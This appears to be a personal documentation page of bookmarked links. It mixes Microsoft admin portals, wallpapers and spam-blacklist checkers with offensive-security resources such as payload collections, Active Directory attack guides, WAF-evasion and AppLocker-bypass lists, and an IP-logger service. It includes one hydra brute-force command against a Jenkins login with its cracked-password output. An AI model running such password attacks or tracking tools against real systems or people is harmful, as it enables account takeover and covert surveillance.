Skip to content
Docs
GitHub

Handy Links

M365Maps - Microsoft 365 Licensing

Section titled “M365Maps - Microsoft 365 Licensing”

M365maps.com

The Book of Secret Knowledge

Section titled “The Book of Secret Knowledge”

A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools, and more.

Github.com - The Book of Secret Knowledge

Awesome hackings

Section titled “Awesome hackings”

A curated list of awesome Hacking. Inspired by awesome-machine-learning

If you want to contribute to this list (please do), send me a pull request or contact me @carpedm20

For a list of free hacking books available for download, go here

Github.com - Awesome hacking

IMEI / iCloud Lock Checking

Section titled “IMEI / iCloud Lock Checking”

iFreeiCloud.co.uk - Checks Model, Capacity, Colour, Find My iPhone Status, Replaced Status, Activation Status, Service Coverage, Technical Support, Warranty Plan, Warranty Expiry & Loaner Status for Apple devices. You can also check non-Apple devices to find the Model & Manufacturer. Tool to check details of iDevices (iPhone, iPad) for iCloud lock / find my iPhone.

ImeiCheck.com - offers a variety of IMEI Check Services providing all the information about your device, fast and accessible!

MITRE framework

Section titled “MITRE framework”

Github.com - Atomic Red Team

AzureAD Enumeration

Section titled “AzureAD Enumeration”

Azure Active Directory - Rootsecdev

OSCP Repo

Section titled “OSCP Repo”

This is a list of resources and scripts that I have been gathering (and continuing to gather) in preparation for OSCP.

Github.com - OSCPRepo

oscp.infosecsanyam.in

itm4n Documentation page

Section titled “itm4n Documentation page”

Blog of offensive security consultant.

itm4n.github.io

Wallpapers

Section titled “Wallpapers”

Wallpaperscraft.com

Unsplash.com

Ebooks

Section titled “Ebooks”

Allitebooks.org

Active directory exploitation and interesting items

Section titled “Active directory exploitation and interesting items”

Infosecmatters.com - Top 16 Active Directory vulnerabilities

Active Directory Security

Section titled “Active Directory Security”

Active Directory & Enterprise Security, Methods to Secure Active Directory, Attack Methods & Effective Defenses, PowerShell, Tech Notes, & Geek Trivia…

Pentesting tools

Section titled “Pentesting tools”

Github.com - Pentest Tools

PayloadAllTheThings

Section titled “PayloadAllTheThings”

Github.com - PayloadAllTheThings

Internet speedtest

Section titled “Internet speedtest”

DSLreports.com

Information Security References

Section titled “Information Security References”

{{%resources fa_icon_class=“far fa-file-archive” pattern=”.*(zip)”/%}}

rmusser.net

Fake name generator

Section titled “Fake name generator”

nl.fakenamegenerator.com

Expired domains

Section titled “Expired domains”

Search for domains that are about to expire or are already expired.

Expireddomains.net

Responsible disclosure

Section titled “Responsible disclosure”

responsibledisclosure.nl

Spamfilter blacklist checking

Section titled “Spamfilter blacklist checking”

Multirbl.valli.org

Matrix.spfbl.net

Iconic — Free “do wtf you want with” pixel-perfect icons

Section titled “Iconic — Free “do wtf you want with” pixel-perfect icons”

Iconic.app

GHDB - Google Hacking Database

Section titled “GHDB - Google Hacking Database”

Exploit-db.com - Google Hacking Database

Attacking Active Directory: 0 to 0.9

Section titled “Attacking Active Directory: 0 to 0.9”

zer1t0.gitlab.io - Attacking Active Directory: 0 to 0.9

Pentesting Jenkins

Section titled “Pentesting Jenkins”

Pwn Jenkins

$ hydra 127.0.0.1 -s 8080 -V -f http-form-post "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:Invalid username or password" -l admin -P /usr/share/wordlists/rockyou.txt            
[...]
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "hottie1" - 556 of 14344399 [child 8] (0/0)
[8080][http-post-form] host: 127.0.0.1   login: admin   password: spongebob
[STATUS] attack finished for 127.0.0.1 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-06-22 15:04:47

Application Security overview and mitigation list

Section titled “Application Security overview and mitigation list”

Applicationsecurity.io - Appsec Findings database list

Web Application Firewall (WAF) Evasion Techniques #3

Section titled “Web Application Firewall (WAF) Evasion Techniques #3”

Secjuice.com - Web Application Firewall (WAF) Evasion Techniques

An A-Z Index of Windows CMD commands

Section titled “An A-Z Index of Windows CMD commands”

An A-Z Index of Windows CMD commands.

Pentesting Web checklist

Section titled “Pentesting Web checklist”

Pentesting Web checklist

Grabify IP LOGGER

Section titled “Grabify IP LOGGER”

Create an URL that will log the IP of visitor(s).

Grabify IP LOGGER

Microsoft Portals Overview

Section titled “Microsoft Portals Overview”

Microsoft has a lot of portals.

After not remembering all the Microsoft Portal URLs so many times, Adam decided to make a list and with a help from a few others, have gotten to this stage. You can read more about the details on the About page.

msportals.io - Microsoft Administrator Sites Github.com - msportals.io - Microsoft Portals

List of Github repositories and articles with list of dorks for different search engines

Section titled “List of Github repositories and articles with list of dorks for different search engines”

Github.com - Dorks collections list

Microsoft AppLocker ByPass Lists

Section titled “Microsoft AppLocker ByPass Lists”

Github.com - Ultimate AppLocker ByPass List